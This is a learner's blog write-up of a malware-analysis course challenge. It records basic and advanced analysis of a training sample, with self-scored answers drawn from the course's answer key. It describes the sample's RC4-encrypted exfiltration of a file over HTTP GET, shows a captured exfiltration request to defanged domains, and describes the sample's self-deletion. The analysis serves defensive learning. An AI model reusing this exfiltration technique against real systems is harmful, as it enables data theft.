Note: This challenge write-up is a “blind analysis”, which was written prior to viewing the answer section of this course. I include how I answered questions, if I got it right or wrong, and why as a reflection for further learning. (Contains spoilers!)

Practical Malware analysis and Triage “Siko Mode” Challenge

This write up comes from the PMAT course that was produced by Husky Hacks. At the time of writing, I am about 3/4 through the course and have found it very valuable from a SOC analyst perspective. It has given me a newfound interest in malware research that I will continue to pursue in the future.

The course is available here for $30 Monthly Subscription (All Access Pass TCM Academy)-

https://academy.tcm-sec.com/p/the-all-access-pass?affcode=770707_o6lvcuwx (Affiliate Link)

This is the second challenge in the series and covers basic static/dynamic analysis and advanced static/dynamic analysis. To see the first challenge that covers “Silly Putty” and is only basic static/dynamic analysis see here http://cybersec.reviews/write-ups/pmatsillyputty/

For this challenge I gave myself a time constraint (partially due to the lack of free time) of 4 hours. I spent 30 minutes on basic static analysis, 1 hour on dynamic analysis, and the rest on advanced static/dynamic analysis.

Challenge Intro

Viewing the provided GitHub repository (https://github.com/HuskyHacks/PMAT-labs/tree/main/labs/2-3.Challenge-SikoMode) provides the following scenario-

“Analyst,

This specimen came from a poor decision and a link that should not have been clicked on. No surprises there. We need to figure out the extent of what this thing can do. It looks a little advanced.

Perform a full analysis and send us the report when done. We need to go in depth on this one to determine what it is doing, so break out your decompiler and debugger and get to work!”

These challenges include a list of questions I will be attempting to answer throughout the analysis, I also self-score myself.

Basic Static Analysis

Hash

I first started basic static analysis by generating a hash of the binary [unknown.exe]which is [6c8f50040545d8cd9af4b51564de654266e592e3]. According to Virus Total at the time of writing the sample has a threat scoring of 41/71 vendors and is C++ compiled. This information might be enough to answer the first question but I wanted to investigate further.

Strings

Next, I pulled strings via the floss command in Flare VM. I did not see many interesting strings other than a reference to a file that is provided by the course @Desktop\cosmo.jpeg.

PE View

Opening the binary in PE view I observed the following information-

The time stamp of the compilation date is [August 1st 2022]. The image section .txt header has a virtual size of [18818] and a raw size of [18A00]. This equates to [304030] bytes and [305000] bytes which does not indicate packing. This is further observed by the absence of packing header sections. Attempting to view the Import Address Table of the binary failed in PE Studio and PE View, the most I was able to view is that the following DLLs are used- [Kernel32.dll] (Terminate process, Virtual Alloc), [Msvcrt.dll] (malloc), and [User32.dll] (messageboxA). According to “malapi.io” the only interesting functions were TerminateProcess and VirtualAlloc. Terminate process namely is used to terminate a process and according to “malapi.io” VirtualAlloc “is often used by malware to allocate memory as part of process injection”. This indicates that this sample could have process injection capabilities, however this will not be fully concluded but kept in mind during further analysis.

Dynamic Analysis

No Internet Simulation

First, I executed the binary without INET Sim enabled to observed any behavior differences. During execution no attempted connections were observed in Wireshark or processes being spawned, about 10 seconds the file would delete itself. I also used the tool “Regshot” to take a snapshot of the registry hive prior and after execution to observe any changes (Tool is available here- https://github.com/Seabreg/Regshot).

Registry Changes

Key : Value Deletion

[Explorer\SessionInfo\1\ApplicationViewManagement] : [VirtualDesktop: 10 00 00 00 30 30 44 56 57 8C 87 23 3F 24 04 4F 9F A5 87 15 32 AC FE 42]

Key : Value Added

[Explorer\UserAssist{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\Unlqra\Qrfxgbc\haxabja.rk] : [0 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF FF FF FF FF 40 AE 62 E5 88 D4 D8 01 00 00 00 00]

[SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Users\User\Desktop\unknown.exe] : [53 41 43 50 01 00 00 00 00 00 00 00 07 00 00 00 28 00 00 00 8B 89 08 00 E1 06 09 00 01 00 00 00 00 00 00 00 00 00 00 0A 73 20 00 00 50 BB 64 ED DD AC D5 01 00 00 00 00 00 00 00 00 02 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7D 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00]

Key : Value Modified

[Multimedia\Audio\Journal\Render] : [CurrentVersion\Schedule\TaskCache\Tasks]

Files Created

System32\rasadhlp.dll

System32\dnsapi.dll

Files Deleted

The only file that was deleted was the sample itself [unknown.exe]

With this information I attempted to answer 1 of the 13 challenge questions.

Challenge Question: Does the binary persist? If so, how?

-My Answer: The binary appears to persist by adding the two keys above which appear to contain hex or shellcode.

-Self Score: Incorrect, the answer is “There is no persistence mechanism used by this malware.”

Internet Simulation

Next, I executed the binary with INET Sim running on my Remnux machine that is in a virtual machine and in the same host only network as my Flare VM. I noticed that the file did not delete itself this time and no child processes were spawned. Using TCP View, I saw that the sample opens local ports [1077-1277] to destination port [80]. The sample continually opens local ports and waits for responses. Terminating the process kills all listening ports and the file does not delete itself.

Using Wireshark on the Remnux, I noticed the sample creates TCP connections via syn, syn ack, ack and then makes a GET request to [hxxp://update.ec12-4-109-278-3-ubuntu20-04[.]local/]. Next, I saw the sample make a DNS query to [Cdn[.]altimiter[.]local] and then finally a GET request to the CDN [GET /feed?post=A8E437E8F0367592569A2870BBDD382A1DFBB01A15FC23999D7788C33502AD9256E481B402BDC6BC25167B6478F204C49A9BADD68C4AC2A617437ECCBBA9 HTTP/1.1\r\n]. The GET request could be the exfiltration mechanism, however attempting to decode it fails. When the process is terminated it sends a TCP reset flag to the previous outbound connections which terminates all TCP connections.

Lastly, I executed the binary with INET Sim running and then terminated INET SIM. I noticed when INET Sim is turned off, the process [unkown.exe] exits and then deletes itself similar to what I observed earlier. The processes retransmit each connection and then sends a reset flag, once all connections are closed it deletes itself. With this information I was able to answer 6 out of the 13 challenge questions.

Challenge Question: Under what conditions can you get the binary to delete itself?

-My Answer: The binary deletes itself when no outbound connections are available or when it loses connection

-Self Score: Correct, I only did not observe that the binary will delete itself “after finishing it’s exfiltration routine”.

Challenge Question: What is the first callback domain?

-My Answer: The first callback domain appears to be [hxxp://update.ec12-4-109-278-3-ubuntu20-04[.]local/]

-Self Score: Correct

Challenge Question: Under what conditions can you get the binary to exfiltrate data?

-My Answer: If the binary can contact the first domain [hxxp://update.ec12-4-109-278-3-ubuntu20-04[.]local/]

-Self Score: Half correct. According the challenge answers the following occurs if the initial domain is contacted- “After a successful check in with this domain, the sample unpacks the passwrd.txt file into C:\Users\Public, opens a handle to cosmo.jpeg, base64 encodes the contents of the file, and begins the data encryption routine.”

Challenge Question: What is the exfiltration domain?

-My Answer: [Cdn[.]altimiter[.]local]

-Self Score: Correct

Challenge Question: What URI is used to exfiltrate data?

-My Answer: GET /feed?post=*Data*

-Self Score: Correct

Advanced Static and Dynamic Analysis

For the static analysis section, I used the tool Cutter which was used the tool used for demonstration in the prior sections. This was only my 3rd time attempting to read ASM language (This course, a crack me challenge, and this challenge) and the 2nd time using a dissembler (A crack me challenge and this challenge). I first struggled trying to figure out the layout of the ASM such as finding the main function. After struggling with only using Cutter, I then opened the binary in x32dgb debugger to use these tools together. I followed the execution in the debugger until it reached a function called “siko”. With this find I was able to observe other functions in Cutter that appear to be more interesting.

I then noticed there was a call to [RC4….] in the ASM this made me think that the exfiltration was using encryption and RC4 since I was not able to decode it.

After struggling through ASM in Cutter and halfway figuring out how to use the debugger for the last of my 4-hour allotted time, it was time to call it quits and see If I gathered enough information to answer the last few questions.

Challenge Question: What language is the binary written in?

-My Answer: C++ according to Virus Total or C according to Cutter

-Self Score: Incorrect. The binary is written in Nim and according to the answer document, this could have been observed via the strings output of the Nim Libraries being referenced.

Challenge Question: What is the architecture of this binary?

-My Answer: X86

-Self Score: Correct

Challenge Question: How does exfiltration take place?

-My Answer: In the GET request with the post parameter

-Self Score: This question was not included in the answer document for reference, but I’m going to call it correct since I’m a noob at this.

Challenge Question: What type of data is exfiltrated (the file is cosmo.jpeg, but how exactly is the file’s data transmitted?)

-My Answer: Over HTTP GET with the data being encrypted

-Self Score: Incorrect. The correct answer is “: The file data from cosmo.jpeg is read in by the malware, then encrypted using the contents of passwrd.txt as the key”.

Challenge Question: What kind of encryption algorithm is in use?

-My Answer: RC4

-Self Score: Correct! I was surprised I got this one right, especially identifying it in the ASM. According to the answer document this was a harder way to figure this out and could have been observed in the IAT libraries which I did not see.

Challenge Question: What key is used to encrypt the data?

-My Answer: genKeystream__OOZOOZOOZOOZOOZOnimbleZpkgsZ8267524548O49O48Z826752_

-Self Score: Incorrect. According to the answer document “The key is the contents of passwrd.txt, which is the text SikoMode”

Challenge Question: What is the significance of houdini?

-My Answer: This was the function that causes the binary to delete itself called “houdini_sikomode_51”

-Self Score: Correct.

My Takeaways

I was proud of myself to get 8.5 out of the 13 questions on this challenge, especially since it was my real first exposure to Reverse Engineering a malware sample. I did have a few takeaways from this challenge that I am keeping in mind for future learning

  1. Practice coding in C/C++ and Assembly. I think being able to write and think more like a programmer would help with my reverse engineering skills. At the time of writing, I have only been exposed to C through Code academy lessons and have been exposed to Assembly only through this course. I added on my “study list” a few C and Assembly courses that I am hoping will help with my malware analysis and reverse engineering skills.
  2. Practice reverse engineering through RE challenges. I have done a cack me RE challenge with a friend while taking this course and enjoyed it very much. After practicing coding, I plan on doing more RE challenges to strengthen this skill itself.
  3. Try to figure out the sample’s “behavior”. While writing this blog post I noticed I did not look into how the sample itself operates. I should have asked further questions such as “How is it exfiltrating data?” or “What is being exfiltrated?” and looked into that. I’m sure this will come with time as I continue my studies.
  4. Malware analysis and reverse engineering is fascinating. I really have been enjoying this course and taking apart samples. I have always enjoyed taking things apart to see how they work and then putting them back together such as mechanical wrist watches or engines. I plan on focusing on this area for future self-studying and doing more courses and challenges. If you have any malware analysis or reverse engineering resources you would suggest, please feel free to reach out to me via Twitter or Instagram below.
  5. Take screenshots. Throughout the analysis I forgot to take screenshots for this challenge, for the future I will have to remember to take the time to use screenshots to document the analysis.
  6. Google things I do not know from strings output. This caused me to miss the question about what language the binary was written in.